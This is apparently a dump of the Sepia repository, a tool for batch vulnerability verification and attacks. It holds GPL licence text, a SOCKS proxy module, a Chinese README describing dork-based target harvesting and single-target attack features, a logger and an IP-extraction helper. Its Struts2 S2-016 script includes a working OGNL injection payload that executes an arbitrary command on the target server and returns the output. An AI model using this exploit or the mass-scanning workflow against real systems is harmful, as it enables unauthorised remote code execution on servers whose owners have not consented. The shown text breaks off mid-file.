216 | patents or other property right claims or to contest validity of any
217 | such claims; this section has the sole purpose of protecting the
218 | integrity of the free software distribution system, which is
219 | implemented by public license practices. Many people have made
220 | generous contributions to the wide range of software distributed
221 | through that system in reliance on consistent application of that
222 | system; it is up to the author/donor to decide if he or she is willing
223 | to distribute software through any other system and a licensee cannot
224 | impose that choice.
225 |
226 | This section is intended to make thoroughly clear what is believed to
227 | be a consequence of the rest of this License.
228 |
229 | 8. If the distribution and/or use of the Program is restricted in
230 | certain countries either by patents or by copyrighted interfaces, the
231 | original copyright holder who places the Program under this License
232 | may add an explicit geographical distribution limitation excluding
233 | those countries, so that distribution is permitted only in or among
234 | countries not thus excluded. In such case, this License incorporates
235 | the limitation as if written in the body of this License.
236 |
237 | 9. The Free Software Foundation may publish revised and/or new versions
238 | of the General Public License from time to time. Such new versions will
239 | be similar in spirit to the present version, but may differ in detail to
240 | address new problems or concerns.
241 |
242 | Each version is given a distinguishing version number. If the Program
243 | specifies a version number of this License which applies to it and "any
244 | later version", you have the option of following the terms and conditions
245 | either of that version or of any later version published by the Free
246 | Software Foundation. If the Program does not specify a version number of
247 | this License, you may choose any version ever published by the Free Software
248 | Foundation.
249 |
250 | 10. If you wish to incorporate parts of the Program into other free
251 | programs whose distribution conditions are different, write to the author
252 | to ask for permission. For software which is copyrighted by the Free
253 | Software Foundation, write to the Free Software Foundation; we sometimes
254 | make exceptions for this. Our decision will be guided by the two goals
255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
257 |
258 | NO WARRANTY
259 |
260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 |
270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
278 | POSSIBILITY OF SUCH DAMAGES.
279 |
280 | END OF TERMS AND CONDITIONS
281 |
282 | How to Apply These Terms to Your New Programs
283 |
284 | If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 |
288 | To do so, attach the following notices to the program. It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 |
293 | {description}
294 | Copyright (C) {year} {fullname}
295 |
296 | This program is free software; you can redistribute it and/or modify
297 | it under the terms of the GNU General Public License as published by
298 | the Free Software Foundation; either version 2 of the License, or
299 | (at your option) any later version.
300 |
301 | This program is distributed in the hope that it will be useful,
302 | but WITHOUT ANY WARRANTY; without even the implied warranty of
303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
304 | GNU General Public License for more details.
305 |
306 | You should have received a copy of the GNU General Public License along
307 | with this program; if not, write to the Free Software Foundation, Inc.,
308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 |
310 | Also add information on how to contact you by electronic and paper mail.
311 |
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 |
315 | Gnomovision version 69, Copyright (C) year name of author
316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 | This is free software, and you are welcome to redistribute it
318 | under certain conditions; type `show c' for details.
319 |
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License. Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 |
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary. Here is a sample; alter the names:
328 |
329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 | `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 |
332 | {signature of Ty Coon}, 1 April 1989
333 | Ty Coon, President of Vice
334 |
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs. If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library. If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 |
--------------------------------------------------------------------------------
/thirdparty/httplib2/socks.py:
--------------------------------------------------------------------------------
1 | """SocksiPy - Python SOCKS module.
2 | Version 1.00
3 |
4 | Copyright 2006 Dan-Haim. All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without modification,
7 | are permitted provided that the following conditions are met:
8 | 1. Redistributions of source code must retain the above copyright notice, this
9 | list of conditions and the following disclaimer.
10 | 2. Redistributions in binary form must reproduce the above copyright notice,
11 | this list of conditions and the following disclaimer in the documentation
12 | and/or other materials provided with the distribution.
13 | 3. Neither the name of Dan Haim nor the names of his contributors may be used
14 | to endorse or promote products derived from this software without specific
15 | prior written permission.
16 |
17 | THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
18 | WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
19 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
20 | EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
21 | INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
22 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
23 | OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
24 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
25 | OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.
26 |
27 |
28 | This module provides a standard socket-like interface for Python
29 | for tunneling connections through SOCKS proxies.
30 |
31 | """
32 |
33 | """
34 |
35 | Minor modifications made by Christopher Gilbert (http://motomastyle.com/)
36 | for use in PyLoris (http://pyloris.sourceforge.net/)
37 |
38 | Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/)
39 | mainly to merge bug fixes found in Sourceforge
40 |
41 | """
42 |
43 | import base64
44 | import socket
45 | import struct
46 | import sys
47 |
48 | if getattr(socket, 'socket', None) is None:
49 | raise ImportError('socket.socket missing, proxy support unusable')
50 |
51 | PROXY_TYPE_SOCKS4 = 1
52 | PROXY_TYPE_SOCKS5 = 2
53 | PROXY_TYPE_HTTP = 3
54 | PROXY_TYPE_HTTP_NO_TUNNEL = 4
55 |
56 | _defaultproxy = None
57 | _orgsocket = socket.socket
58 |
59 | class ProxyError(Exception): pass
60 | class GeneralProxyError(ProxyError): pass
61 | class Socks5AuthError(ProxyError): pass
62 | class Socks5Error(ProxyError): pass
63 | class Socks4Error(ProxyError): pass
64 | class HTTPError(ProxyError): pass
65 |
66 | _generalerrors = ("success",
67 | "invalid data",
68 | "not connected",
69 | "not available",
70 | "bad proxy type",
71 | "bad input")
72 |
73 | _socks5errors = ("succeeded",
74 | "general SOCKS server failure",
75 | "connection not allowed by ruleset",
76 | "Network unreachable",
77 | "Host unreachable",
78 | "Connection refused",
79 | "TTL expired",
80 | "Command not supported",
81 | "Address type not supported",
82 | "Unknown error")
83 |
84 | _socks5autherrors = ("succeeded",
85 | "authentication is required",
86 | "all offered authentication methods were rejected",
87 | "unknown username or invalid password",
88 | "unknown error")
89 |
90 | _socks4errors = ("request granted",
91 | "request rejected or failed",
92 | "request rejected because SOCKS server cannot connect to identd on the client",
93 | "request rejected because the client program and identd report different user-ids",
94 | "unknown error")
95 |
96 | def setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
97 | """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
98 | Sets a default proxy which all further socksocket objects will use,
99 | unless explicitly changed.
100 | """
101 | global _defaultproxy
102 | _defaultproxy = (proxytype, addr, port, rdns, username, password)
103 |
104 | def wrapmodule(module):
105 | """wrapmodule(module)
106 | Attempts to replace a module's socket library with a SOCKS socket. Must set
107 | a default proxy using setdefaultproxy(...) first.
108 | This will only work on modules that import socket directly into the namespace;
109 | most of the Python Standard Library falls into this category.
110 | """
111 | if _defaultproxy != None:
112 | module.socket.socket = socksocket
113 | else:
114 | raise GeneralProxyError((4, "no proxy specified"))
115 |
116 | class socksocket(socket.socket):
117 | """socksocket([family[, type[, proto]]]) -> socket object
118 | Open a SOCKS enabled socket. The parameters are the same as
119 | those of the standard socket init. In order for SOCKS to work,
120 | you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
121 | """
122 |
123 | def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
124 | _orgsocket.__init__(self, family, type, proto, _sock)
125 | if _defaultproxy != None:
126 | self.__proxy = _defaultproxy
127 | else:
128 | self.__proxy = (None, None, None, None, None, None)
129 | self.__proxysockname = None
130 | self.__proxypeername = None
131 | self.__httptunnel = True
132 |
133 | def __recvall(self, count):
134 | """__recvall(count) -> data
135 | Receive EXACTLY the number of bytes requested from the socket.
136 | Blocks until the required number of bytes have been received.
137 | """
138 | data = self.recv(count)
139 | while len(data) < count:
140 | d = self.recv(count-len(data))
141 | if not d: raise GeneralProxyError((0, "connection closed unexpectedly"))
142 | data = data + d
143 | return data
144 |
145 | def sendall(self, content, *args):
146 | """ override socket.socket.sendall method to rewrite the header
147 | for non-tunneling proxies if needed
148 | """
149 | if not self.__httptunnel:
150 | content = self.__rewriteproxy(content)
151 | return super(socksocket, self).sendall(content, *args)
152 |
153 | def __rewriteproxy(self, header):
154 | """ rewrite HTTP request headers to support non-tunneling proxies
155 | (i.e. those which do not support the CONNECT method).
156 | This only works for HTTP (not HTTPS) since HTTPS requires tunneling.
157 | """
158 | host, endpt = None, None
159 | hdrs = header.split("\r\n")
160 | for hdr in hdrs:
161 | if hdr.lower().startswith("host:"):
162 | host = hdr
163 | elif hdr.lower().startswith("get") or hdr.lower().startswith("post"):
164 | endpt = hdr
165 | if host and endpt:
166 | hdrs.remove(host)
167 | hdrs.remove(endpt)
168 | host = host.split(" ")[1]
169 | endpt = endpt.split(" ")
170 | if (self.__proxy[4] != None and self.__proxy[5] != None):
171 | hdrs.insert(0, self.__getauthheader())
172 | hdrs.insert(0, "Host: %s" % host)
173 | hdrs.insert(0, "%s http://%s%s %s" % (endpt[0], host, endpt[1], endpt[2]))
174 | return "\r\n".join(hdrs)
175 |
176 | def __getauthheader(self):
177 | auth = self.__proxy[4] + ":" + self.__proxy[5]
178 | return "Proxy-Authorization: Basic " + base64.b64encode(auth)
179 |
180 | def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
181 | """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
182 | Sets the proxy to be used.
183 | proxytype - The type of the proxy to be used. Three types
184 | are supported: PROXY_TYPE_SOCKS4 (including socks4a),
185 | PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
186 | addr - The address of the server (IP or DNS).
187 | port - The port of the server. Defaults to 1080 for SOCKS
188 | servers and 8080 for HTTP proxy servers.
189 | rdns - Should DNS queries be preformed on the remote side
190 | (rather than the local side). The default is True.
191 | Note: This has no effect with SOCKS4 servers.
192 | username - Username to authenticate with to the server.
193 | The default is no authentication.
194 | password - Password to authenticate with to the server.
195 | Only relevant when username is also provided.
196 | """
197 | self.__proxy = (proxytype, addr, port, rdns, username, password)
198 |
199 | def __negotiatesocks5(self, destaddr, destport):
200 | """__negotiatesocks5(self,destaddr,destport)
201 | Negotiates a connection through a SOCKS5 server.
202 | """
203 | # First we'll send the authentication packages we support.
204 | if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
205 | # The username/password details were supplied to the
206 | # setproxy method so we support the USERNAME/PASSWORD
207 | # authentication (in addition to the standard none).
208 | self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02))
209 | else:
210 | # No username/password were entered, therefore we
211 | # only support connections with no authentication.
212 | self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00))
213 | # We'll receive the server's response to determine which
214 | # method was selected
215 | chosenauth = self.__recvall(2)
216 | if chosenauth[0:1] != chr(0x05).encode():
217 | self.close()
218 | raise GeneralProxyError((1, _generalerrors[1]))
219 | # Check the chosen authentication method
220 | if chosenauth[1:2] == chr(0x00).encode():
221 | # No authentication is required
222 | pass
223 | elif chosenauth[1:2] == chr(0x02).encode():
224 | # Okay, we need to perform a basic username/password
225 | # authentication.
226 | self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5])
227 | authstat = self.__recvall(2)
228 | if authstat[0:1] != chr(0x01).encode():
229 | # Bad response
230 | self.close()
231 | raise GeneralProxyError((1, _generalerrors[1]))
232 | if authstat[1:2] != chr(0x00).encode():
233 | # Authentication failed
234 | self.close()
235 | raise Socks5AuthError((3, _socks5autherrors[3]))
236 | # Authentication succeeded
237 | else:
238 | # Reaching here is always bad
239 | self.close()
240 | if chosenauth[1] == chr(0xFF).encode():
241 | raise Socks5AuthError((2, _socks5autherrors[2]))
242 | else:
243 | raise GeneralProxyError((1, _generalerrors[1]))
244 | # Now we can request the actual connection
245 | req = struct.pack('BBB', 0x05, 0x01, 0x00)
246 | # If the given destination address is an IP address, we'll
247 | # use the IPv4 address request even if remote resolving was specified.
248 | try:
249 | ipaddr = socket.inet_aton(destaddr)
250 | req = req + chr(0x01).encode() + ipaddr
251 | except socket.error:
252 | # Well it's not an IP number, so it's probably a DNS name.
253 | if self.__proxy[3]:
254 | # Resolve remotely
255 | ipaddr = None
256 | req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr
257 | else:
258 | # Resolve locally
259 | ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
260 | req = req + chr(0x01).encode() + ipaddr
261 | req = req + struct.pack(">H", destport)
262 | self.sendall(req)
263 | # Get the response
264 | resp = self.__recvall(4)
265 | if resp[0:1] != chr(0x05).encode():
266 | self.close()
267 | raise GeneralProxyError((1, _generalerrors[1]))
268 | elif resp[1:2] != chr(0x00).encode():
269 | # Connection failed
270 | self.close()
271 | if ord(resp[1:2])<=8:
272 | raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])]))
273 | else:
274 | raise Socks5Error((9, _socks5errors[9]))
275 | # Get the bound address/port
276 | elif resp[3:4] == chr(0x01).encode():
277 | boundaddr = self.__recvall(4)
278 | elif resp[3:4] == chr(0x03).encode():
279 | resp = resp + self.recv(1)
280 | boundaddr = self.__recvall(ord(resp[4:5]))
281 | else:
282 | self.close()
283 | raise GeneralProxyError((1,_generalerrors[1]))
284 | boundport = struct.unpack(">H", self.__recvall(2))[0]
285 | self.__proxysockname = (boundaddr, boundport)
286 | if ipaddr != None:
287 | self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
288 | else:
289 | self.__proxypeername = (destaddr, destport)
290 |
291 | def getproxysockname(self):
292 | """getsockname() -> address info
293 | Returns the bound IP address and port number at the proxy.
294 | """
295 | return self.__proxysockname
296 |
297 | def getproxypeername(self):
298 | """getproxypeername() -> address info
299 | Returns the IP and port number of the proxy.
300 | """
301 | return _orgsocket.getpeername(self)
302 |
303 | def getpeername(self):
304 | """getpeername() -> address info
305 | Returns the IP address and port number of the destination
306 | machine (note: getproxypeername returns the proxy)
307 | """
308 | return self.__proxypeername
309 |
310 | def __negotiatesocks4(self,destaddr,destport):
311 | """__negotiatesocks4(self,destaddr,destport)
312 | Negotiates a connection through a SOCKS4 server.
313 | """
314 | # Check if the destination address provided is an IP address
315 | rmtrslv = False
316 | try:
317 | ipaddr = socket.inet_aton(destaddr)
318 | except socket.error:
319 | # It's a DNS name. Check where it should be resolved.
320 | if self.__proxy[3]:
321 | ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01)
322 | rmtrslv = True
323 | else:
324 | ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
325 | # Construct the request packet
326 | req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr
327 | # The username parameter is considered userid for SOCKS4
328 | if self.__proxy[4] != None:
329 | req = req + self.__proxy[4]
330 | req = req + chr(0x00).encode()
331 | # DNS name if remote resolving is required
332 | # NOTE: This is actually an extension to the SOCKS4 protocol
333 | # called SOCKS4A and may not be supported in all cases.
334 | if rmtrslv:
335 | req = req + destaddr + chr(0x00).encode()
336 | self.sendall(req)
337 | # Get the response from the server
338 | resp = self.__recvall(8)
339 | if resp[0:1] != chr(0x00).encode():
340 | # Bad data
341 | self.close()
342 | raise GeneralProxyError((1,_generalerrors[1]))
343 | if resp[1:2] != chr(0x5A).encode():
344 | # Server returned an error
345 | self.close()
346 | if ord(resp[1:2]) in (91, 92, 93):
347 | self.close()
348 | raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90]))
349 | else:
350 | raise Socks4Error((94, _socks4errors[4]))
351 | # Get the bound address/port
352 | self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0])
353 | if rmtrslv != None:
354 | self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
355 | else:
356 | self.__proxypeername = (destaddr, destport)
357 |
358 | def __negotiatehttp(self, destaddr, destport):
359 | """__negotiatehttp(self,destaddr,destport)
360 | Negotiates a connection through an HTTP server.
361 | """
362 | # If we need to resolve locally, we do this now
363 | if not self.__proxy[3]:
364 | addr = socket.gethostbyname(destaddr)
365 | else:
366 | addr = destaddr
367 | headers = ["CONNECT ", addr, ":", str(destport), " HTTP/1.1\r\n"]
368 | headers += ["Host: ", destaddr, "\r\n"]
369 | if (self.__proxy[4] != None and self.__proxy[5] != None):
370 | headers += [self.__getauthheader(), "\r\n"]
371 | headers.append("\r\n")
372 | self.sendall("".join(headers).encode())
373 | # We read the response until we get the string "\r\n\r\n"
374 | resp = self.recv(1)
375 | while resp.find("\r\n\r\n".encode()) == -1:
376 | resp = resp + self.recv(1)
377 | # We just need the first line to check if the connection
378 | # was successful
379 | statusline = resp.splitlines()[0].split(" ".encode(), 2)
380 | if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()):
381 | self.close()
382 | raise GeneralProxyError((1, _generalerrors[1]))
383 | try:
384 | statuscode = int(statusline[1])
385 | except ValueError:
386 | self.close()
387 | raise GeneralProxyError((1, _generalerrors[1]))
388 | if statuscode != 200:
389 | self.close()
390 | raise HTTPError((statuscode, statusline[2]))
391 | self.__proxysockname = ("0.0.0.0", 0)
392 | self.__proxypeername = (addr, destport)
393 |
394 | def connect(self, destpair):
395 | """connect(self, despair)
396 | Connects to the specified destination through a proxy.
397 | destpar - A tuple of the IP/DNS address and the port number.
398 | (identical to socket's connect).
399 | To select the proxy server use setproxy().
400 | """
401 | # Do a minimal input check first
402 | if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (not isinstance(destpair[0], basestring)) or (type(destpair[1]) != int):
403 | raise GeneralProxyError((5, _generalerrors[5]))
404 | if self.__proxy[0] == PROXY_TYPE_SOCKS5:
405 | if self.__proxy[2] != None:
406 | portnum = self.__proxy[2]
407 | else:
408 | portnum = 1080
409 | _orgsocket.connect(self, (self.__proxy[1], portnum))
410 | self.__negotiatesocks5(destpair[0], destpair[1])
411 | elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
412 | if self.__proxy[2] != None:
413 | portnum = self.__proxy[2]
414 | else:
415 | portnum = 1080
416 | _orgsocket.connect(self,(self.__proxy[1], portnum))
417 | self.__negotiatesocks4(destpair[0], destpair[1])
418 | elif self.__proxy[0] == PROXY_TYPE_HTTP:
419 | if self.__proxy[2] != None:
420 | portnum = self.__proxy[2]
421 | else:
422 | portnum = 8080
423 | _orgsocket.connect(self,(self.__proxy[1], portnum))
424 | self.__negotiatehttp(destpair[0], destpair[1])
425 | elif self.__proxy[0] == PROXY_TYPE_HTTP_NO_TUNNEL:
426 | if self.__proxy[2] != None:
427 | portnum = self.__proxy[2]
428 | else:
429 | portnum = 8080
430 | _orgsocket.connect(self,(self.__proxy[1],portnum))
431 | if destpair[1] == 443:
432 | self.__negotiatehttp(destpair[0],destpair[1])
433 | else:
434 | self.__httptunnel = False
435 | elif self.__proxy[0] == None:
436 | _orgsocket.connect(self, (destpair[0], destpair[1]))
437 | else:
438 | raise GeneralProxyError((4, _generalerrors[4]))
439 |
--------------------------------------------------------------------------------
7 |
8 | ## 一些说明
9 | Sepia是在POC-T的基础上做了精简、改进而成的,因此首先要感谢@cdxy的POC-T项目:[POC-T](https://github.com/Xyntax/POC-T)。
10 |
11 | 与POC-T相比,Sepia有以下一些变化:
12 |
13 | **1. 数据搜集方式的变化**
14 |
15 | 去掉了Google dork、Shodan dork,只保留了Zoomeye dork,增加了Baidu dork(URL爬虫)。
16 |
17 | **2. 增加了URL正则抓取定制功能**
18 |
19 | 一些Web应用程序的漏洞其对应的URL可能千变万化,仅利用@cdxy批量[规范URL的方法](https://www.cdxy.me/?p=640)会降低验证效率,因此Sepia在toolkit文件中增加了正则定制项`urlfilter`,通过配合百度URL爬虫,能大大提升抓取和验证的效率。
20 |
21 | **3. 改变了一些输出显示**
22 |
23 | Sepia去掉了POC-T导出到文件的功能,引入`prettytable`直接将结果做成表格显示在终端。
24 |
25 | **4. 脚本编写要求的变化**
26 |
27 | 由于Sepia含有漏洞的攻击功能,但各种漏洞的攻击方式会有很大差异,目前已经基本确定了Sepia的脚本编写规则和标准,这应该是和POC-T有比较大区别的地方。
28 |
29 | **总之,POC-T专注的是并发批量处理任务,而Sepia只专注高效批量PoC验证并能对单个目标实施攻击。**
30 |
31 | ## Wiki
32 |
33 | * [使用举例](https://github.com/S4kur4/Sepia/wiki/使用举例)
34 | * [参数说明](https://github.com/S4kur4/Sepia/wiki/参数说明)
35 | * [脚本编写规则](https://github.com/S4kur4/Sepia/wiki/脚本编写规则)
36 | * [脚本库](https://github.com/S4kur4/Sepia/wiki/脚本库)
37 |
38 | ## 后话
39 |
40 | Sepia还处于开发版本阶段,有任何问题烦请发邮件至:[s4kur4s4kur4@gmail.com](mailto:s4kur4s4kur4@gmail.com?Subject=Hello%20S4kur4)。
41 |
42 | **2017年10月29日更新**:由于ZoomEye方面一直处于升级更新状态,近期本来想完善Sepia的ZoomEye Dork代码,但ZoomEye的API迟迟未开放导致不能继续完善。暂时我先慢慢扩充脚本库吧。
43 |
44 | **2018年7月18日更新**: 离开了大半年,发生了很多事,近期回归。
45 |
--------------------------------------------------------------------------------
/lib/core/log.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #-*- coding:utf-8 -*-
3 |
4 | import logging
5 | import sys
6 |
7 | from lib.core.enums import CUSTOM_LOGGING
8 |
9 | logging.addLevelName(CUSTOM_LOGGING.SYSINFO, "*")
10 | logging.addLevelName(CUSTOM_LOGGING.SUCCESS, "+")
11 | logging.addLevelName(CUSTOM_LOGGING.ERROR, "-")
12 | logging.addLevelName(CUSTOM_LOGGING.WARNING, "!")
13 |
14 | LOGGER = logging.getLogger("TookitLogger")
15 |
16 | LOGGER_HANDLER = None
17 | try:
18 | from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler
19 |
20 | try:
21 | LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout)
22 | LOGGER_HANDLER.level_map[logging.getLevelName("*")] = (None, "cyan", False)
23 | LOGGER_HANDLER.level_map[logging.getLevelName("+")] = (None, "green", False)
24 | LOGGER_HANDLER.level_map[logging.getLevelName("-")] = (None, "red", False)
25 | LOGGER_HANDLER.level_map[logging.getLevelName("!")] = (None, "yellow", False)
26 | except Exception:
27 | LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
28 |
29 | except ImportError:
30 | LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
31 |
32 | FORMATTER = logging.Formatter("\r[%(levelname)s] %(message)s", "%H:%M:%S")
33 |
34 | LOGGER_HANDLER.setFormatter(FORMATTER)
35 | LOGGER.addHandler(LOGGER_HANDLER)
36 | LOGGER.setLevel(CUSTOM_LOGGING.WARNING)
37 |
38 |
39 | class MY_LOGGER:
40 | @staticmethod
41 | def success(msg):
42 | return LOGGER.log(CUSTOM_LOGGING.SUCCESS, msg)
43 |
44 | @staticmethod
45 | def info(msg):
46 | return LOGGER.log(CUSTOM_LOGGING.SYSINFO, msg)
47 |
48 | @staticmethod
49 | def warning(msg):
50 | return LOGGER.log(CUSTOM_LOGGING.WARNING, msg)
51 |
52 | @staticmethod
53 | def error(msg):
54 | return LOGGER.log(CUSTOM_LOGGING.ERROR, msg)
55 |
--------------------------------------------------------------------------------
/script/struts2_016_get_rce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #-*- coding:utf-8 -*-
3 | # author = S4kur4
4 | _type = 'RCE'
5 | """
6 | Struts2 S2-016 Remote Code Execution PoC (CVE-2013-2251)
7 |
8 | Version:
9 | 2.0.0-2.3.15
10 | """
11 |
12 | import requests
13 | import random
14 |
15 | header = {
16 | "User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0",
17 | "Connection" : "keep-alive",
18 | "Accept" : "*/*",
19 | "Accept-Encoding" : "deflate",
20 | "Accept-Language" : "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4"
21 | }
22 |
23 | def poc(url):
24 | if '://' not in url:
25 | url = 'http://' + url
26 | try:
27 | a = random.randint(100, 200)
28 | b = random.randint(100, 200)
29 | c = a * b
30 | url = url + "?redirect:%25{" + "%s*%s}" % (str(a), str(b))
31 | response = requests.get(url=url, headers=header, timeout=5)
32 | if str(c) in response.text and response.status_code == 404:
33 | return True
34 | else:
35 | return False
36 | except Exception:
37 | return False
38 |
39 | def exp(url, command):
40 | url = url + "?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27"+command+"%27.toString().split(%27\\\\s%27))).start().getInputStream()).useDelimiter(%27\\\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
41 | response = requests.get(url=url, headers=header, timeout=5)
42 | print response.text.rstrip()
43 |
--------------------------------------------------------------------------------
/plugin/extracts.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #-*- coding:utf-8 -*-
3 |
4 |
5 | import re
6 | import requests
7 |
8 |
9 | def getIP(content, remove_duplicate=True, remove_private=False):
10 | """
11 | Functions to extract IP from content string
12 |
13 | parameters:
14 | content
15 | remove_duplicate (default:true)
16 | remove_private (default:False)
17 |
18 | usage:
19 | from lib.util.extracts import *
20 | ip_list = getIP(content)
21 |
22 | private address:
23 | 10.0.0.0 - 10.255.255.255
24 | 172.16.0.0 - 172.31.255.255
25 | 192.168.0.0 - 192.168.255.255
26 | 127.0.0.0 - 127.255.255.255
27 |
28 | example:
29 | > print getIP('ffeac12.2.2.2asf^&10.10\n.1.1ffa2\n')
30 | ['12.2.2.2','10.10.1.1']
31 |
32 | """
33 |
34 | def _isPrivateIP(strict_IP):
35 | p1 = re.compile(r'^10\.|^172\.(?:1[6789]|2\d|31)\.|^192\.168\.|^127\.')
36 | return True if re.match(p1, strict_IP) else False
37 |
38 | content = content.replace('\n', ',')
39 | p = re.compile(r'(?:(?:2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(?:2[0-4]\d|25[0-5]|[01]?\d\d?)')
40 | _ = re.findall(p, content)
41 | ans = list(set(_)) if remove_duplicate else _
42 |
43 | if remove_private:
44 | for each in ans:
45 | if _isPrivateIP(each):
46 | ans.remove(each)
47 |
48 | return ans
49 |
50 |
51 | def getTitle(input):
52 | """
53 | Get title from html-content/ip/url
54 |
55 | :param input:html-content OR ip OR url
56 | :return text in